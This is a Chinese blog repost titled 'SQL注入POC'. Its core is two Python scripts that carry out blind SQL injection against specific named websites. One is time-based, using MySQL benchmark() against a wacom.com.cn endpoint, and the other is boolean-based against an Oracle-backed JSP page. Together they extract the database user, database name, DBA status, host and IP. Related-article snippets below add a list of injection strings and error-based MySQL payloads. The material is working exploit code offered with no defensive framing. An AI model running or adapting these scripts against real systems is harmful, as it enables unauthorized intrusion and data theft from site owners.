SQL注入POC

最新推荐文章于 2024-05-08 20:29:46 发布
最新推荐文章于 2024-05-08 20:29:46 发布
阅读量501 收藏 2
点赞数
文章标签: 数据库 移动开发
原文链接:http://www.cnblogs.com/shellr00t/p/5237376.html
版权

mysql

# encoding=utf-8
import httplib
import time
import string
import sys
import random
import urllib

headers = {
     ' User-Agent '' Mozilla/5.0 (Linux; U; Android 2.3.6; en-us; Nexus S Build/GRK39F) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1 ',
}
payloads = list( ' abcdefghijklmnopqrstuvwxyz0123456789@_. ')
print  ' start to retrive MySQL user: '
user =  ''
for i  in range(1,20):
     for payload  in payloads:        
          s =  " ascii(mid(lower(user()),%s,1))=%s " % (i, ord(payload))        
          s =  " if(%s,benchmark(2000000,md5(1)),0) " % s
          conn = httplib.HTTPConnection( ' wacom2012.wacom.com.cn ', timeout=30)
          conn.request(method= ' GET ',url= " /AjaxRequest/Ajax_Page.aspx?id=%s&method=getregprocity " % urllib.quote(s), headers = headers)
          start_time = time.time()        
          conn.getresponse()
          conn.close()
           print  ' . ',              
           # print time.time() - start_time
           if time.time() - start_time >2:
                user += payload
                 print  ' \n[In progress] ', user,
                 # time.sleep(4.0)
                 break
print  ' \n[Done]MySQL user is %s ' % user

 

 

 

 

 

from

 

http://wooyun.org/bugs/wooyun-2010-0170936
http://zone.wooyun.org/content/25653

 

Oracle

oracle 基于bool 盲注

 

# encoding=utf-8

import httplib
import requests
import time
import string
import sys
payloads = list('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789@_.')
print '[%s] Start to retrive Oracle info' % time.strftime('%H:%M:%S', time.localtime())
currentuser = ''
currentdb = ''
isdba1 = ''
currenthost = ''
currentip = ''
for i in range(1,6,1):
    for payload in payloads:
        response = requests.get("http://silkroad.testweb.org/testweb/website/201402001/cn/cContent.jsp?id=F0F0D1CCA972D899E040A8C048013331' AND ASCII(SUBSTR(user,{},1))={} AND '1'='1".format(str(i),str(ord(payload))))
        if len(response.content) > 145000:
            currentuser += payload
            print '[currentuser]' ,currentuser
            time.sleep(0.01)
            break

for i in range (1,5,1):
    for payload in payloads:
        response = requests.get("http://silkroad.testweb.org/testweb/website/201402001/cn/cContent.jsp?id=F0F0D1CCA972D899E040A8C048013331' and ASCII(SUBSTR((SYS_CONTEXT('USERENV','DB_NAME')),{},1))={} and '1'='1".format(str(i),str(ord(payload))))
        if len(response.content) > 145000:
            currentdb += payload
            print '[currentdb]' ,currentdb
            time.sleep(0.01)
            break

for i in range (1,6,1):
    for payload in payloads:
        response = requests.get("http://silkroad.testweb.org/testweb/website/201402001/cn/cContent.jsp?id=F0F0D1CCA972D899E040A8C048013331' and ASCII(SUBSTR((SYS_CONTEXT('USERENV','ISDBA')),{},1))={} and '1'='1".format(str(i),str(ord(payload))))
        if len(response.content) > 145000:
            isdba1 += payload
            print '[currentisdba1]' ,isdba1
            time.sleep(0.01)
            break

for i in range (1,9,1):
    for payload in payloads:
        response = requests.get("http://silkroad.testweb.org/testweb/website/201402001/cn/cContent.jsp?id=F0F0D1CCA972D899E040A8C048013331' and ASCII(SUBSTR((SYS_CONTEXT('USERENV','HOST')),{},1))={} and '1'='1".format(str(i),str(ord(payload))))
        if len(response.content) > 145000:
            currenthost += payload
            print '[currenthost]' ,currenthost
            time.sleep(0.01)
            break

for i in range (1,13,1):
    for payload in payloads:
        response = requests.get("http://silkroad.testweb.org/testweb/website/201402001/cn/cContent.jsp?id=F0F0D1CCA972D899E040A8C048013331' and ASCII(SUBSTR((SYS_CONTEXT('USERENV','IP_ADDRESS')),{},1))={} and '1'='1".format(str(i),str(ord(payload))))
        if len(response.content) > 145000:
            currentip += payload
            print '[currentip]' ,currentip
            time.sleep(0.01)
            break            

print '[%s] Stop to retrive Oracle info' % time.strftime('%H:%M:%S', time.localtime())

 

转载于:https://www.cnblogs.com/shellr00t/p/5237376.html

王爷的大房子
关注
37-4 用Python编写SQL注入的基于错误报告的POC
weixin_43263566的博客
04-22 188
SQL注入是一种常见的应用程序安全漏洞,发生在应用程序与数据库层之间。简而言之,它是通过在输入的字符串中注入SQL指令来实现的,如果程序设计不良未进行充分检查,那么这些注入的指令就可能被数据库服务器误认为是正常的SQL指令而被执行,导致数据泄露或系统被入侵。SQL注入漏洞的原理是在输入的数据中插入SQL代码,以利用应用程序对输入数据的不完善验证。对于分类中的每种类型,都需要针对性地设计相应的防御策略,并在代码编写和测试阶段进行充分的安全审查和测试。
37-5 基于时间的盲注 SQL 注入 PoC 的 Python 编写
weixin_43263566的博客
04-24 229
通过这个脚本,我们可以理解到利用Python编写脚本可以自动化执行一些复杂的任务,比如在这个例子中,我们通过自动化的方式来利用时间盲注漏洞获取数据库名称。,通过逐渐增加数据库名称长度的方式,发送带有长度检测payload的HTTP请求,直到找到正确的长度为止。,利用多线程技术,同时测试每个位置上的数据库名称字符,直到获取完整的数据库名称为止。,通过发送包含特殊payload的HTTP请求来检查是否存在SQL注入点。,用于测试给定位置的数据库名称字符是否匹配。下,依次调用上述函数,完成整个过程。
sql注入pythonpoco_Python3实现PoC——wooyun-2014-070827(SQL注入)
weixin_39991531的博客
12-11 153
一、演示一下的利用效果二、漏洞说明这次的PoC是验证SQL注入,漏洞详情三、代码+注释importrequestsimportargparseparser=argparse.ArgumentParser()parser.add_argument('-u',dest="url")args=parser.parse_args()url=args.url#存在漏洞的页面url+=...
sql注入pythonpoc_SQL注入POC
weixin_39702714的博客
12-17 262
#encoding=utf-8importhttplibimportrequestsimporttimeimportstringimportsyspayloads= list('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789@_.')print '[%s] Start to retrive Oracle info' % ...
sql注入
linyuezhouzhou的博客
07-08 490
湖南省网安基地
Python3实现PoC——wooyun-2014-070827(SQL注入)
weixin_33910434的博客
12-18 310
一、演示一下的利用效果二、漏洞说明这次的PoC是验证SQL注入,漏洞详情三、代码+注释importrequests importargparse parser=argparse.ArgumentParser() parser.add_argument('-u',dest="url") args=parser.parse_args() url=args.ur...
瑞友天翼2024SQL注入漏洞poc
02-27
标题中的“瑞友天翼2024SQL注入漏洞poc”指的是瑞友天翼2024版本存在SQL注入漏洞,而POC(Proof of Concept)是指概念验证,通常是一个简单的程序或脚本,用于证明某个安全漏洞确实存在。在网络安全领域,POC是黑客...
泛微E-Cology getLabelByModule SQL注入(含批量验证poc
weixin_43567873的博客
04-18 241
泛微E-Cology getLabelByModule SQL注入(含批量验证poc
用友时空KSOA存在sql注入漏洞 附POC
nnn2188185的博客
09-24 546
用友时空KSOA是建立在SOA理念指导下研发的新一代产品,该产品common/dept.jsp接口存在SQL注入漏洞。
sql注入pythonpoc_Python3实现PoC——wooyun-2014-070827(SQL注入)
weixin_35517006的博客
02-11 200
一、演示一下的利用效果二、漏洞说明这次的PoC是验证SQL注入,漏洞详情三、代码+注释importrequestsimportargparseparser=argparse.ArgumentParser()parser.add_argument(‘-u‘,dest="url")args=parser.parse_args()url=args.url#存在漏洞的页面url+=...
一个简单sql注入poc
weixin_30279315的博客
12-13 578
最近在提高自己编程能力,拿一些实用的小工具练下。该脚本为python语言,主要涉及模块urllib,re。 功能:验证CmsEasy5.5爆账号密码 实验用源码:http://pan.baidu.com/s/1i4lAwBF 搭建环境:phpstudy     试了IIs+php没爆出来最好用phpstudy。 通过浏览器访问确认存在漏洞存在。 用python来实现。 i...
渗透测试之POC基于报错的sql注入
黑面狐
01-03 5476
sql注入一般是主要有三种,基于报错注入,基于布尔的盲注和基于时间的盲注。 原理我不多说了,今天开始写sql注入poc。 首先POC的漏洞存在的证明,而sql注入poc我们只要证明sql语句被执行了即可。 首先看我们的测试环境。 测试环境中我们再注入的参数加个单引号,发现可以有sql报错,从报错额语句中可以看出是基于报错的字符型sql注入 此时用union来确定有多少
sql注入漏洞poc代码fuzz代码
yyyyxzj的博客
08-22 296
"or "a"="aor 1=1--'or 1=1--"or 1=1--'or'a'='a'or''=''or'='or''OR 1=1"or 1=1'xor'or 1=1/*1'or'1'='1or a = a1 or 1=1a'?' or 1=1--------23 OR 1=10 or 1=1or 0=0 --' or 0=0 #or 0=0 #"
Java程序员从笨鸟到菜鸟之(一百)sql注入攻击详解(一)sql注入原理详解
红太阳照大地
10-24 215
前段时间,在很多博客和微博中暴漏出了12306铁道部网站的一些漏洞,作为这么大的一个项目,要说有漏洞也不是没可能,但其漏洞确是一些菜鸟级程序员才会犯的错误。其实sql注入漏洞就是一个。作为一个菜鸟小程序员,我对sql注入的东西了解的也不深入,所以抽出时间专门学习了一下。现在把学习成果分享给大家,希望可以帮助大家学习。下面我们就来看一下。 一、什么是sql注入呢? 所谓SQL...
poc练习-dvwa靶场sql注入(盲注)
qq_44248518的博客
02-24 346
dvwasql注入poc(Python)
sql注入pythonpoco_十种MySQL报错注入
weixin_39532352的博客
12-11 126
1.floor()select * from test where id=1 and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a);2.extractvalue()select * from test where id=1 a...
SQL注入(注入姿势和Bypass)
2301_79870948的博客
03-20 1009
UNION 操作符用于连接两个以上的 SELECT 语句的结果组合到一个结果集合中。前提是两个select必有相同列。注意:要用联合查询进行注入则:页面必须有显示位首先,便要判断注入点的列数,这里使用order by + 列数--+联合查询注入:这里通过查询数据表不存在的数据,从而执行后面的union语句,来获取显示位使用联合查询注入爆出敏感数据:得到了数据库名后,进行下一步,得到表名下一步,得到字段名,强调数据库名和表名可以使查到的数据更准),3--+
Python从0到POC编写--SQL注入
最新发布
余十步的博客
05-08 1440
SQL注入POC编写。
写一个sql注入poc
02-22
首先,你需要构建一个SQL语句,其中包含一个恶意输入,这个恶意输入将会改变SQL语句的正常执行流程,从而允许攻击者控制SQL语句的执行,从而获取数据库中的信息,或者提供攻击者访问权限等。具体的构建方法可以参考...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值